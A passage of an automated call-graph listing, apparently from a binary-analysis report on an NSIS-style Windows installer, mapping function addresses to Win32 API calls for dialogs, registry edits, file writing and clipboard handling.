API calls 4297->4302 4298 4046c9 4358 40485f 4298->4358 4362 405cb0 GetDlgItemTextW 4298->4362 4299->4298 4307 406831 18 API calls 4299->4307 4299->4358 4300 404516 4301 406064 5 API calls 4300->4301 4303 40451c 4301->4303 4305 40457d ShowWindow 4302->4305 4306 403ea0 5 API calls 4303->4306 4305->4310 4311 404521 GetDlgItem 4306->4311 4312 40465b SHBrowseForFolderW 4307->4312 4308 4046f5 4313 4067aa 18 API calls 4308->4313 4309 403df6 8 API calls 4314 404873 4309->4314 4315 4045a5 SetWindowTextW 4310->4315 4319 405d85 4 API calls 4310->4319 4316 40452f IsDlgButtonChecked 4311->4316 4311->4358 4312->4298 4318 404673 CoTaskMemFree 4312->4318 4323 4046fb 4313->4323 4317 403d6b 19 API calls 4315->4317 4316->4294 4321 4045c3 4317->4321 4322 40674e 3 API calls 4318->4322 4320 40459b 4319->4320 4320->4315 4327 40674e 3 API calls 4320->4327 4324 403d6b 19 API calls 4321->4324 4325 404680 4322->4325 4363 406035 lstrcpynW 4323->4363 4328 4045ce 4324->4328 4329 4046b7 SetDlgItemTextW 4325->4329 4334 406831 18 API calls 4325->4334 4327->4315 4361 403dc4 SendMessageW 4328->4361 4329->4298 4330 404712 4332 406328 3 API calls 4330->4332 4341 40471a 4332->4341 4333 4045d6 4335 406328 3 API calls 4333->4335 4336 40469f lstrcmpiW 4334->4336 4335->4299 4336->4329 4339 4046b0 lstrcatW 4336->4339 4337 40475c 4364 406035 lstrcpynW 4337->4364 4339->4329 4340 404765 4342 405d85 4 API calls 4340->4342 4341->4337 4345 40677d 2 API calls 4341->4345 4347 4047b1 4341->4347 4343 40476b GetDiskFreeSpaceW 4342->4343 4346 40478f MulDiv 4343->4346 4343->4347 4345->4341 4346->4347 4348 40480e 4347->4348 4365 4043d9 4347->4365 4349 404831 4348->4349 4351 40141d 80 API calls 4348->4351 4373 403db1 KiUserCallbackDispatcher 4349->4373 4351->4349 4352 4047ff 4354 404810 SetDlgItemTextW 4352->4354 4355 404804 4352->4355 4354->4348 4357 4043d9 21 API calls 4355->4357 4356 40484d 4356->4358 4374 403d8d 4356->4374 4357->4348 4358->4309 4360->4300 4361->4333 4362->4308 4363->4330 4364->4340 4366 4043f9 4365->4366 4367 406831 18 API calls 4366->4367 4368 404439 4367->4368 4369 406831 18 API calls 4368->4369 4370 404444 4369->4370 4371 406831 18 API calls 4370->4371 4372 404454 lstrlenW wsprintfW SetDlgItemTextW 4371->4372 4372->4352 4373->4356 4375 403da0 SendMessageW 4374->4375 4376 403d9b 4374->4376 4375->4358 4376->4375 4377 401dd3 4378 401446 18 API calls 4377->4378 4379 401dda 4378->4379 4380 401446 18 API calls 4379->4380 4381 4018d3 4380->4381 4382 402e55 4383 40145c 18 API calls 4382->4383 4384 402e63 4383->4384 4385 402e79 4384->4385 4386 40145c 18 API calls 4384->4386 4387 405e5c 2 API calls 4385->4387 4386->4385 4388 402e7f 4387->4388 4412 405e7c GetFileAttributesW CreateFileW 4388->4412 4390 402e8c 4391 402f35 4390->4391 4392 402e98 GlobalAlloc 4390->4392 4395 4062cf 11 API calls 4391->4395 4393 402eb1 4392->4393 4394 402f2c CloseHandle 4392->4394 4413 403368 SetFilePointer 4393->4413 4394->4391 4397 402f45 4395->4397 4399 402f50 DeleteFileW 4397->4399 4400 402f63 4397->4400 4398 402eb7 4401 403336 ReadFile 4398->4401 4399->4400 4414 401435 4400->4414 4403 402ec0 GlobalAlloc 4401->4403 4404 402ed0 4403->4404 4405 402f04 WriteFile GlobalFree 4403->4405 4407 40337f 33 API calls 4404->4407 4406 40337f 33 API calls 4405->4406 4408 402f29 4406->4408 4411 402edd 4407->4411 4408->4394 4410 402efb GlobalFree 4410->4405 4411->4410 4412->4390 4413->4398 4415 404f9e 25 API calls 4414->4415 4416 401443 4415->4416 4417 401cd5 4418 401446 18 API calls 4417->4418 4419 401cdd 4418->4419 4420 401446 18 API calls 4419->4420 4421 401ce8 4420->4421 4422 40145c 18 API calls 4421->4422 4423 401cf1 4422->4423 4424 401d07 lstrlenW 4423->4424 4425 401d43 4423->4425 4426 401d11 4424->4426 4426->4425 4430 406035 lstrcpynW 4426->4430 4428 401d2c 4428->4425 4429 401d39 lstrlenW 4428->4429 4429->4425 4430->4428 4431 402cd7 4432 401446 18 API calls 4431->4432 4434 402c64 4432->4434 4433 402d17 ReadFile 4433->4434 4434->4431 4434->4433 4435 402d99 4434->4435 4436 402dd8 4437 4030e3 4436->4437 4438 402ddf 4436->4438 4439 402de5 FindClose 4438->4439 4439->4437 4440 401d5c 4441 40145c 18 API calls 4440->4441 4442 401d63 4441->4442 4443 40145c 18 API calls 4442->4443 4444 401d6c 4443->4444 4445 401d73 lstrcmpiW 4444->4445 4446 401d86 lstrcmpW 4444->4446 4447 401d79 4445->4447 4446->4447 4448 401c99 4446->4448 4447->4446 4447->4448 4449 4027e3 4450 4027e9 4449->4450 4451 4027f2 4450->4451 4452 402836 4450->4452 4465 401553 4451->4465 4453 40145c 18 API calls 4452->4453 4455 40283d 4453->4455 4457 4062cf 11 API calls 4455->4457 4456 4027f9 4458 40145c 18 API calls 4456->4458 4462 401a13 4456->4462 4459 40284d 4457->4459 4460 40280a RegDeleteValueW 4458->4460 4469 40149d RegOpenKeyExW 4459->4469 4461 4062cf 11 API calls 4460->4461 4464 40282a RegCloseKey 4461->4464 4464->4462 4466 401563 4465->4466 4467 40145c 18 API calls 4466->4467 4468 401589 RegOpenKeyExW 4467->4468 4468->4456 4472 4014c9 4469->4472 4477 401515 4469->4477 4470 4014ef RegEnumKeyW 4471 401501 RegCloseKey 4470->4471 4470->4472 4474 406328 3 API calls 4471->4474 4472->4470 4472->4471 4473 401526 RegCloseKey 4472->4473 4475 40149d 3 API calls 4472->4475 4473->4477 4476 401511 4474->4476 4475->4472 4476->4477 4478 401541 RegDeleteKeyW 4476->4478 4477->4462 4478->4477 4479 4040e4 4480 4040ff 4479->4480 4486 40422d 4479->4486 4482 40413a 4480->4482 4510 403ff6 WideCharToMultiByte 4480->4510 4481 404298 4483 40436a 4481->4483 4484 4042a2 GetDlgItem 4481->4484 4490 403d6b 19 API calls 4482->4490 4491 403df6 8 API calls 4483->4491 4487 40432b 4484->4487 4488 4042bc 4484->4488 4486->4481 4486->4483 4489 404267 GetDlgItem SendMessageW 4486->4489 4487->4483 4492 40433d 4487->4492 4488->4487 4496 4042e2 6 API calls 4488->4496 4515 403db1 KiUserCallbackDispatcher 4489->4515 4494 40417a 4490->4494 4495 404365 4491->4495 4497 404353 4492->4497 4498 404343 SendMessageW 4492->4498 4500 403d6b 19 API calls 4494->4500 4496->4487 4497->4495 4501 404359 SendMessageW 4497->4501 4498->4497 4499 404293 4502 403d8d SendMessageW 4499->4502 4503 404187 CheckDlgButton 4500->4503 4501->4495 4502->4481 4513 403db1 KiUserCallbackDispatcher 4503->4513 4505 4041a5 GetDlgItem 4514 403dc4 SendMessageW 4505->4514 4507 4041bb SendMessageW 4508 4041e1 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4507->4508 4509 4041d8 GetSysColor 4507->4509 4508->4495 4509->4508 4511 404033 4510->4511 4512 404015 GlobalAlloc WideCharToMultiByte 4510->4512 4511->4482 4512->4511 4513->4505 4514->4507 4515->4499 4516 402ae4 4517 402aeb 4516->4517 4518 4030e3 4516->4518 4519 402af2 CloseHandle 4517->4519 4519->4518 4520 402065 4521 401446 18 API calls 4520->4521 4522 40206d 4521->4522 4523 401446 18 API calls 4522->4523 4524 402076 GetDlgItem 4523->4524 4525 4030dc 4524->4525 4526 4030e3 4525->4526 4528 405f7d wsprintfW 4525->4528 4528->4526 4529 402665 4530 40145c 18 API calls 4529->4530 4531 40266b 4530->4531 4532 40145c 18 API calls 4531->4532 4533 402674 4532->4533 4534 40145c 18 API calls 4533->4534 4535 40267d 4534->4535 4536 4062cf 11 API calls 4535->4536 4537 40268c 4536->4537 4538 406301 2 API calls 4537->4538 4539 402695 4538->4539 4540 4026a6 lstrlenW lstrlenW 4539->4540 4542 404f9e 25 API calls 4539->4542 4544 4030e3 4539->4544 4541 404f9e 25 API calls 4540->4541 4543 4026e8 SHFileOperationW 4541->4543 4542->4539 4543->4539 4543->4544 4545 401c69 4546 40145c 18 API calls 4545->4546 4547 401c70 4546->4547 4548 4062cf 11 API calls 4547->4548 4549 401c80 4548->4549 4550 405ccc MessageBoxIndirectW 4549->4550 4551 401a13 4550->4551 4552 402f6e 4553 402f72 4552->4553 4554 402fae 4552->4554 4556 4062cf 11 API calls 4553->4556 4555 40145c 18 API calls 4554->4555 4562 402f9d 4555->4562 4557 402f7d 4556->4557 4558 4062cf 11 API calls 4557->4558 4559 402f90 4558->4559 4560 402fa2 4559->4560 4561 402f98 4559->4561 4564 406113 9 API calls 4560->4564 4563 403ea0 5 API calls 4561->4563 4563->4562 4564->4562 4565 4023f0 4566 402403 4565->4566 4567 4024da 4565->4567 4568 40145c 18 API calls 4566->4568 4569 404f9e 25 API calls 4567->4569 4570 40240a 4568->4570 4573 4024f1 4569->4573 4571 40145c 18 API calls 4570->4571 4572 402413 4571->4572 4574 402429 LoadLibraryExW 4572->4574 4575 40241b GetModuleHandleW 4572->4575 4576 4024ce 4574->4576 4577 40243e 4574->4577 4575->4574 4575->4577 4579 404f9e 25 API calls 4576->4579 4589 406391 GlobalAlloc WideCharToMultiByte 4577->4589 4579->4567 4580 402449 4581 40248c 4580->4581 4582 40244f 4580->4582 4583 404f9e 25 API calls 4581->4583 4584 401435 25 API calls 4582->4584 4587 40245f 4582->4587 4585 402496 4583->4585 4584->4587 4586 4062cf 11 API calls 4585->4586 4586->4587 4587->4573 4588 4024c0 FreeLibrary 4587->4588 4588->4573 4590 4063c9 GlobalFree 4589->4590 4591 4063bc GetProcAddress 4589->4591 4590->4580 4591->4590 3431 402175 3432 401446 18 API calls 3431->3432 3433 40217c 3432->3433 3434 401446 18 API calls 3433->3434 3435 402186 3434->3435 3436 402197 3435->3436 3439 4062cf 11 API calls 3435->3439 3437 4021aa EnableWindow 3436->3437 3438 40219f ShowWindow 3436->3438 3440 4030e3 3437->3440 3438->3440 3439->3436 4592 4048f8 4593 404906 4592->4593 4594 40491d 4592->4594 4595 40490c 4593->4595 4610 404986 4593->4610 4596 40492b IsWindowVisible 4594->4596 4602 404942 4594->4602 4597 403ddb SendMessageW 4595->4597 4599 404938 4596->4599 4596->4610 4600 404916 4597->4600 4598 40498c CallWindowProcW 4598->4600 4611 40487a SendMessageW 4599->4611 4602->4598 4616 406035 lstrcpynW 4602->4616 4604 404971 4617 405f7d wsprintfW 4604->4617 4606 404978 4607 40141d 80 API calls 4606->4607 4608 40497f 4607->4608 4618 406035 lstrcpynW 4608->4618 4610->4598 4612 4048d7 SendMessageW 4611->4612 4613 40489d GetMessagePos ScreenToClient SendMessageW 4611->4613 4615 4048cf 4612->4615 4614 4048d4 4613->4614 4613->4615 4614->4612 4615->4602 4616->4604 4617->4606 4618->4610 3733 4050f9 3734 4052c1 3733->3734 3735 40511a GetDlgItem GetDlgItem GetDlgItem 3733->3735 3736 4052f2 3734->3736 3737 4052ca GetDlgItem CreateThread CloseHandle 3734->3737 3782 403dc4 SendMessageW 3735->3782 3739 405320 3736->3739 3741 405342 3736->3741 3742 40530c ShowWindow ShowWindow 3736->3742 3737->3736 3785 405073 OleInitialize 3737->3785 3743 40537e 3739->3743 3745 405331 3739->3745 3746 405357 ShowWindow 3739->3746 3740 40518e 3752 406831 18 API calls 3740->3752 3747 403df6 8 API calls 3741->3747 3784 403dc4 SendMessageW 3742->3784 3743->3741 3748 405389 SendMessageW 3743->3748 3749 403d44 SendMessageW 3745->3749 3750 405377 3746->3750 3751 405369 3746->3751 3757 4052ba 3747->3757 3756 4053a2 CreatePopupMenu 3748->3756 3748->3757 3749->3741 3755 403d44 SendMessageW 3750->3755 3753 404f9e 25 API calls 3751->3753 3754 4051ad 3752->3754 3753->3750 3758 4062cf 11 API calls 3754->3758 3755->3743 3759 406831 18 API calls 3756->3759 3760 4051b8 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3758->3760 3761 4053b2 AppendMenuW 3759->3761 3762 405203 SendMessageW SendMessageW 3760->3762 3763 40521f 3760->3763 3764 4053c5 GetWindowRect 3761->3764 3765 4053d8 3761->3765 3762->3763 3766 405232 3763->3766 3767 405224 SendMessageW 3763->3767 3768 4053df TrackPopupMenu 3764->3768 3765->3768 3769 403d6b 19 API calls 3766->3769 3767->3766 3768->3757 3770 4053fd 3768->3770 3771 405242 3769->3771 3772 405419 SendMessageW 3770->3772 3773 40524b ShowWindow 3771->3773 3774 40527f GetDlgItem SendMessageW 3771->3774 3772->3772 3775 405436 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3772->3775 3776 405261 ShowWindow 3773->3776 3777 40526e 3773->3777 3774->3757 3778 4052a2 SendMessageW SendMessageW 3774->3778 3779 40545b SendMessageW 3775->3779 3776->3777 3783 403dc4 SendMessageW 3777->3783 3778->3757 3779->3779 3780 405486 GlobalUnlock SetClipboardData CloseClipboard 3779->3780 3780->3757 3782->3740 3783->3774 3784->3739 3786 403ddb SendMessageW 3785->3786 3790 405096 3786->3790 3787 403ddb SendMessageW 3788 4050d1 OleUninitialize 3787->3788 3789 4062cf 11 API calls 3789->3790 3790->3789 3791 40139d 80 API calls 3790->3791 3792 4050c1 3790->3792 3791->3790 3792->3787 4619 4020f9 GetDC GetDeviceCaps 4620 401446 18 API calls 4619->4620 4621 402116 MulDiv 4620->4621 4622 401446 18 API calls 4621->4622 4623 40212c 4622->4623 4624 406831 18 API calls 4623->4624 4625 402165 CreateFontIndirectW 4624->4625 4626 4030dc 4625->4626 4627 4030e3 4626->4627 4629 405f7d wsprintfW 4626->4629 4629->4627 4630 4024fb 4631 40145c 18 API calls 4630->4631 4632 402502 4631->4632 4633 40145c 18 API calls 4632->4633 4634 40250c 4633->4634 4635 40145c 18 API calls 4634->4635 4636 402515 4635->4636 4637 40145c 18 API calls 4636->4637 4638 40251f 4637->4638 4639 40145c 18 API calls 4638->4639 4640 402529 4639->4640 4641 40253d 4640->4641 4642 40145c 18 API calls 4640->4642 4643 4062cf 11 API calls 4641->4643 4642->4641 4644 40256a CoCreateInstance 4643->4644 4645 40258c 4644->4645 4646 4026fc 4648 402708 4646->4648 4649 401ee4 4646->4649 4647 406831 18 API calls 4647->4649 4649->4646 4649->4647 3793 4019fd 3794 40145c 18 API calls 3793->3794 3795 401a04 3794->3795 3798 405eab 3795->3798 3799 405eb8 GetTickCount GetTempFileNameW 3798->3799 3800 401a0b 3799->3800 3801 405eee 3799->3801 3801->3799 3801->3800 4650 4022fd 4651 40145c 18 API calls 4650->4651 4652 402304 GetFileVersionInfoSizeW 4651->4652 4653 4030e3 4652->4653 4654 40232b GlobalAlloc 4652->4654 4654->4653 4655 40233f GetFileVersionInfoW 4654->4655 4656 402350 VerQueryValueW 4655->4656 4657 402381 GlobalFree 4655->4657 4656->4657 4658 402369 4656->4658 4657->4653 4663 405f7d wsprintfW 4658->4663 4661 402375 4664 405f7d wsprintfW 4661->4664 4663->4661 4664->4657 4665 402afd 4666 40145c 18 API calls 4665->4666 4667 402b04 4666->4667 4672 405e7c GetFileAttributesW CreateFileW 4667->4672 4669 402b10 4670 4030e3 4669->4670 4673 405f7d wsprintfW 4669->4673 4672->4669 4673->4670 4674 4029ff 4675 401553 19 API calls 4674->4675 4676 402a09 4675->4676 4677 40145c 18 API calls 4676->4677 4678 402a12 4677->4678 4679 402a1f RegQueryValueExW 4678->4679 4683 401a13 4678->4683 4680 402a45 4679->4680 4681 402a3f 4679->4681 4682 4029e4 RegCloseKey 4680->4682 4680->4683 4681->4680 4685 405f7d wsprintfW 4681->4685 4682->4683 4685->4680 4686 401000 4687 401037 BeginPaint GetClientRect 4686->4687 4688 40100c DefWindowProcW 4686->4688 4690 4010fc 4687->4690 4691 401182 4688->4691 4692 401073 CreateBrushIndirect FillRect DeleteObject 4690->4692 4693 401105 4690->4693 4692->4690 4694 401170 EndPaint 4693->4694 4695 40110b CreateFontIndirectW 4693->4695 4694->4691 4695->4694 4696 40111b 6 API calls 4695->4696 4696->4694 4697 401f80 4698 401446 18 API calls 4697->4698 4699 401f88 4698->4699 4700 401446 18 API calls 4699->4700 4701 401f93 4700->4701 4702 401fa3 4701->4702 4703 40145c 18 API calls 4701->4703 4704 401fb3 4702->4704 4705 40145c 18 API calls 4702->4705 4703->4702 4706 402006 4704->4706 4707 401fbc 4704->4707 4705->4704 4708 40145c 18 API calls 4706->4708 4709 401446 18 API calls 4707->4709 4710 40200d 4708->4710 4711 401fc4 4709->4711 4713 40145c 18 API calls 4710->4713 4712 401446 18 API calls 4711->4712 4714 401fce 4712->4714 4715 402016 FindWindowExW 4713->4715 4716 401ff6 SendMessageW 4714->4716 4717 401fd8 SendMessageTimeoutW 4714->4717 4719 402036 4715->4719 4716->4719 4717->4719 4718 4030e3 4719->4718 4721 405f7d wsprintfW 4719->4721 4721->4718 4722 402880 4723 402884 4722->4723 4724 40145c 18 API calls 4723->4724 4725 4028a7 4724->4725 4726 40145c 18 API calls 4725->4726 4727 4028b1 4726->4727 4728 4028ba RegCreateKeyExW 4727->4728 4729 4028e8 4728->4729 4734 4029ef 4728->4734 4730 402934 4729->4730 4732 40145c 18 API calls 4729->4732 4731 402963 4730->4731 4733 401446 18 API calls 4730->4733 4735 4029ae RegSetValueExW 4731->4735 4738 40337f 33 API calls 4731->4738 4736 4028fc lstrlenW 4732->4736 4737 402947 4733->4737 4741 4029c6 RegCloseKey 4735->4741 4742 4029cb 4735->4742 4739 402918 4736->4739 4740 40292a 4736->4740 4744 4062cf 11 API calls 4737->4744 4745 40297b 4738->4745 4746 4062cf 11 API calls 4739->4746 4747 4062cf 11 API calls 4740->4747 4741->4734 4743 4062cf 11 API calls 4742->4743 4743->4741 4744->4731 4753 406250 4745->4753 4750 402922 4746->4750 4747->4730 4750->4735 4752 4062cf 11 API calls 4752->4750 4754 406273 4753->4754 4755 4062b6 4754->4755 4756 406288 wsprintfW 4754->4756 4757 402991 4755->4757 4758 4062bf lstrcatW 4755->4758 4756->4755 4756->4756 4757->4752 4758->4757 4759 403d02 4760 403d0d 4759->4760 4761 403d11 4760->4761 4762 403d14 GlobalAlloc 4760->4762 4762->4761 4763 402082 4764 401446 18 API calls 4763->4764 4765 402093 SetWindowLongW 4764->4765 4766 4030e3 4765->4766 4767 402a84 4768 401553 19 API calls 4767->4768 4769 402a8e 4768->4769 4770 401446 18 API calls 4769->4770 4771 402a98 4770->4771 4772 401a13 4771->4772 4773 402ab2 RegEnumKeyW 4771->4773 4774 402abe RegEnumValueW 4771->4774 4775 402a7e 4773->4775 4774->4772 4774->4775 4775->4772 4776 4029e4 RegCloseKey 4775->4776 4776->4772 4777 402c8a 4778 402ca2 4777->4778 4779 402c8f 4777->4779 4781 40145c 18 API calls 4778->4781 4780 401446 18 API calls 4779->4780 4783 402c97 4780->4783 4782 402ca9 lstrlenW 4781->4782 4782->4783 4784 401a13 4783->4784 4785 402ccb WriteFile 4783->4785 4785->4784 4786 401d8e 4787 40145c 18 API calls 4786->4787 4788 401d95 ExpandEnvironmentStringsW 4787->4788 4789 401da8 4788->4789 4790 401db9 4788->4790 4789->4790 4791 401dad lstrcmpW 4789->4791 4791->4790 4792 401e0f 4793 401446 18 API calls 4792->4793 4794 401e17 4793->4794 4795 401446 18 API calls 4794->4795 4796 401e21 4795->4796 4797 4030e3 4796->4797 4799 405f7d wsprintfW 4796->4799 4799->4797 4800 40438f 4801 4043c8 4800->4801 4802 40439f 4800->4802 4803 403df6 8 API calls 4801->4803 4804 403d6b 19 API calls 4802->4804 4806 4043d4 4803->4806 4805 4043ac SetDlgItemTextW 4804->4805 4805->4801 4807 403f90 4808 403fa0 4807->4808 4809 403fbc 4807->4809 4818 405cb0 GetDlgItemTextW 4808->4818 4811 403fc2 SHGetPathFromIDListW 4809->4811 4812 403fef 4809->4812 4814 403fd2 4811->4814 4817 403fd9 SendMessageW 4811->4817 4813 403fad SendMessageW 4813->4809 4815 40141d 80 API calls 4814->4815 4815->4817 4817->4812 4818->4813 4819 402392 4820 40145c 18 API calls 4819->4820 4821 402399 4820->4821 4824 407224 4821->4824 4825 406efe 25 API calls 4824->4825 4826 407244 4825->4826 4827 4023a7 4826->4827 4828 40724e lstrcpynW lstrcmpW 4826->4828 4829 407280 4828->4829 4830 407286 lstrcpynW 4828->4830 4829->4830 4830->4827 3338 402713 3353 406035 lstrcpynW 3338->3353 3340 40272c 3354 406035 lstrcpynW 3340->3354 3342 402738 3343 402743 3342->3343 3344 40145c 18 API calls 3342->3344 3345 40145c 18 API calls 3343->3345 3347 402752 3343->3347 3344->3343 3345->3347 3348 40145c 18 API calls 3347->3348 3350 402761 3347->3350 3348->3350 3355 40145c 3350->3355 3353->3340 3354->3342 3363 406831 3355->3363 3358 401497 3360 4062cf lstrlenW wvsprintfW 3358->3360 3403 406113 3360->3403 3372 40683e 3363->3372 3364 406aab 3365 401488 3364->3365 3398 406035 lstrcpynW 3364->3398 3365->3358 3382 406064 3365->3382 3367 4068ff GetVersion 3377 40690c 3367->3377 3368 406a72 lstrlenW 3368->3372 3370 406831 10 API calls 3370->3368 3372->3364 3372->3367 3372->3368 3372->3370 3375 406064 5 API calls 3372->3375 3396 405f7d wsprintfW 3372->3396 3397 406035 lstrcpynW 3372->3397 3374 40697e GetSystemDirectoryW 3374->3377 3375->3372 3376 406991 GetWindowsDirectoryW 3376->3377 3377->3372 3377->3374 3377->3376 3378 406831 10 API calls 3377->3378 3379 406a0b lstrcatW 3377->3379 3380 4069c5 SHGetSpecialFolderLocation 3377->3380 3391 405eff RegOpenKeyExW 3377->3391 3378->3377 3379->3372 3380->3377 3381 4069dd SHGetPathFromIDListW CoTaskMemFree 3380->3381 3381->3377 3389 406071 3382->3389 3383 4060e7 3384 4060ed CharPrevW 3383->3384 3386 40610d 3383->3386 3384->3383 3385 4060da CharNextW 3385->3383 3385->3389 3386->3358 3388 4060c6 CharNextW 3388->3389 3389->3383 3389->3385 3389->3388 3390 4060d5 CharNextW 3389->3390 3399 405d32 3389->3399 3390->3385 3392 405f33 RegQueryValueExW 3391->3392 3393 405f78 3391->3393 3394 405f55 RegCloseKey 3392->3394 3393->3377 3394->3393 3396->3372 3397->3372 3398->3365 3400 405d38 3399->3400 3401 405d4e 3400->3401 3402 405d3f CharNextW 3400->3402 3401->3389 3402->3400 3404 40613c 3403->3404 3405 40611f 3403->3405 3407 4061b3 3404->3407 3408 406159 3404->3408 3409 40277f WritePrivateProfileStringW 3404->3409 3406 406129 CloseHandle 3405->3406 3405->3409 3406->3409 3407->3409 3410 4061bc lstrcatW lstrlenW WriteFile 3407->3410 3408->3410 3411 406162 GetFileAttributesW 3408->3411 3410->3409 3416 405e7c GetFileAttributesW CreateFileW 3411->3416 3413 40617e 3413->3409 3414 4061a8 SetFilePointer 3413->3414 3415 40618e WriteFile 3413->3415 3414->3407 3415->3414 3416->3413 4831 402797 4832 40145c 18 API calls 4831->4832 4833 4027ae 4832->4833 4834 40145c 18 API calls 4833->4834 4835 4027b7 4834->4835 4836 40145c 18 API calls 4835->4836 4837 4027c0 GetPrivateProfileStringW lstrcmpW 4836->4837 4838 401e9a 4839 40145c 18 API calls 4838->4839 4840 401ea1 4839->4840 4841 401446 18 API calls 4840->4841 4842 401eab wsprintfW 4841->4842 3802 401a1f 3803 40145c 18 API calls 3802->3803 3804 401a26 3803->3804 3805 4062cf 11 API calls 3804->3805 3806 401a49 3805->3806 3807 401a64 3806->3807 3808 401a5c 3806->3808 3877 406035 lstrcpynW 3807->3877 3876 406035 lstrcpynW 3808->3876 3811 401a6f 3878 40674e lstrlenW CharPrevW 3811->3878 3812 401a62 3815 406064 5 API calls 3812->3815 3846 401a81 3815->3846 3816 406301 2 API calls 3816->3846 3819 401a98 CompareFileTime 3819->3846 3820 401ba9 3821 404f9e 25 API calls 3820->3821 3823 401bb3 3821->3823 3822 401b5d 3824 404f9e 25 API calls 3822->3824 3855 40337f 3823->3855 3826 401b70 3824->3826 3830 4062cf 11 API calls 3826->3830 3828 406035 lstrcpynW 3828->3846 3829 4062cf 11 API calls 3831 401bda 3829->3831 3835 401b8b 3830->3835 3832 401be9 SetFileTime 3831->3832 3833 401bf8 CloseHandle 3831->3833 3832->3833 3833->3835 3836 401c09 3833->3836 3834 406831 18 API calls 3834->3846 3837 401c21 3836->3837 3838 401c0e 3836->3838 3839 406831 18 API calls 3837->3839 3840 406831 18 API calls 3838->3840 3841 401c29 3839->3841 3843 401c16 lstrcatW 3840->3843 3844 4062cf 11 API calls 3841->3844 3843->3841 3847 401c34 3844->3847 3845 401b50 3849 401b93 3845->3849 3850 401b53 3845->3850 3846->3816 3846->3819 3846->3820 3846->3822 3846->3828 3846->3834 3846->3845 3848 4062cf 11 API calls 3846->3848 3854 405e7c GetFileAttributesW CreateFileW 3846->3854 3881 405e5c GetFileAttributesW 3846->3881 3884 405ccc 3846->3884 3851 405ccc MessageBoxIndirectW 3847->3851 3848->3846 3852 4062cf 11 API calls 3849->3852 3853 4062cf 11 API calls 3850->3853 3851->3835 3852->3835 3853->3822 3854->3846 3856 40339a 3855->3856 3857 4033c7 3856->3857 3890 403368 SetFilePointer 3856->3890 3888 403336 ReadFile 3857->3888 3861 401bc6 3861->3829 3862 403546 3864 40354a 3862->3864 3865 40356e 3862->3865 3863 4033eb GetTickCount 3863->3861 3868 403438 3863->3868 3866 403336 ReadFile 3864->3866 3865->3861 3869 403336 ReadFile 3865->3869 3870 40358d WriteFile 3865->3870 3866->3861 3867 403336 ReadFile 3867->3868 3868->3861 3868->3867 3872 40348a GetTickCount 3868->3872 3873 4034af MulDiv wsprintfW 3868->3873 3875 4034f3 WriteFile 3868->3875 3869->3865 3870->3861 3871 4035a1 3870->3871 3871->3861 3871->3865 3872->3868 3874 404f9e 25 API calls 3873->3874 3874->3868 3875->3861 3875->3868 3876->3812 3877->3811 3879 401a75 lstrcatW 3878->3879 3880 40676b lstrcatW 3878->3880 3879->3812 3880->3879 3882 405e79 3881->3882 3883 405e6b SetFileAttributesW 3881->3883 3882->3846 3883->3882 3885 405ce1 3884->3885 3886 405d2f 3885->3886 3887 405cf7 MessageBoxIndirectW 3885->3887 3886->3846 3887->3886 3889 403357 3888->3889 3889->3861 3889->3862 3889->3863 3890->3857 4843 40209f GetDlgItem GetClientRect 4844 40145c 18 API calls 4843->4844 4845 4020cf LoadImageW SendMessageW 4844->4845 4846 4030e3 4845->4846 4847 4020ed DeleteObject 4845->4847 4847->4846 4848 402b9f 4849 401446 18 API calls 4848->4849 4853 402ba7 4849->4853 4850 402c4a 4851 402bdf ReadFile 4851->4853 4860 402c3d 4851->4860 4852 401446 18 API calls 4852->4860 4853->4850 4853->4851 4854 402c06 MultiByteToWideChar 4853->4854 4855 402c3f 4853->4855 4856 402c4f 4853->4856 4853->4860 4854->4853 4854->4856 4861 405f7d wsprintfW 4855->4861 4858 402c6b SetFilePointer 4856->4858 4856->4860 4858->4860 4859 402d17 ReadFile 4859->4860 4860->4850 4860->4852 4860->4859 4861->4850 3417 402b23 GlobalAlloc 3418 402b39 3417->3418 3419 402b4b 3417->3419 3428 401446 3418->3428 3421 40145c 18 API calls 3419->3421 3422 402b52 WideCharToMultiByte lstrlenA 3421->3422 3423 402b41 3422->3423 3424 402b84 WriteFile 3423->3424 3425 402b93 3423->3425 3424->3425 3426 402384 GlobalFree 3424->3426 3426->3425 3429 406831 18 API calls 3428->3429 3430 401455 3429->3430 3430->3423 4862 4040a3 4863 4040b0 lstrcpynW lstrlenW 4862->4863 4864 4040ad 4862->4864 4864->4863 3441 4054a5 3442 4055f9 3441->3442 3443 4054bd 3441->3443 3445 40564a 3442->3445 3446 40560a GetDlgItem GetDlgItem 3442->3446 3443->3442 3444 4054c9 3443->3444 3448 4054d4 SetWindowPos 3444->3448 3449 4054e7 3444->3449 3447 4056a4 3445->3447 3455 40139d 80 API calls 3445->3455 3450 403d6b 19 API calls 3446->3450 3456 4055f4 3447->3456 3511 403ddb 3447->3511 3448->3449 3452 405504 3449->3452 3453 4054ec ShowWindow 3449->3453 3454 405634 SetClassLongW 3450->3454 3457 405526 3452->3457 3458 40550c DestroyWindow 3452->3458 3453->3452 3459 40141d 80 API calls 3454->3459 3462 40567c 3455->3462 3460 40552b SetWindowLongW 3457->3460 3461 40553c 3457->3461 3463 405908 3458->3463 3459->3445 3460->3456 3464 4055e5 3461->3464 3465 405548 GetDlgItem 3461->3465 3462->3447 3466 405680 SendMessageW 3462->3466 3463->3456 3472 405939 ShowWindow 3463->3472 3531 403df6 3464->3531 3469 405578 3465->3469 3470 40555b SendMessageW IsWindowEnabled 3465->3470 3466->3456 3467 40141d 80 API calls 3480 4056b6 3467->3480 3468 40590a DestroyWindow KiUserCallbackDispatcher 3468->3463 3474 405585 3469->3474 3477 4055cc SendMessageW 3469->3477 3478 405598 3469->3478 3486 40557d 3469->3486 3470->3456 3470->3469 3472->3456 3473 406831 18 API calls 3473->3480 3474->3477 3474->3486 3476 403d6b 19 API calls 3476->3480 3477->3464 3481 4055a0 3478->3481 3482 4055b5 3478->3482 3479 4055b3 3479->3464 3480->3456 3480->3467 3480->3468 3480->3473 3480->3476 3502 40584a DestroyWindow 3480->3502 3514 403d6b 3480->3514 3525 40141d 3481->3525 3483 40141d 80 API calls 3482->3483 3485 4055bc 3483->3485 3485->3464 3485->3486 3528 403d44 3486->3528 3488 405731 GetDlgItem 3489 405746 3488->3489 3490 40574f ShowWindow KiUserCallbackDispatcher 3488->3490 3489->3490 3517 403db1 KiUserCallbackDispatcher 3490->3517 3492 405779 EnableWindow 3495 40578d 3492->3495 3493 405792 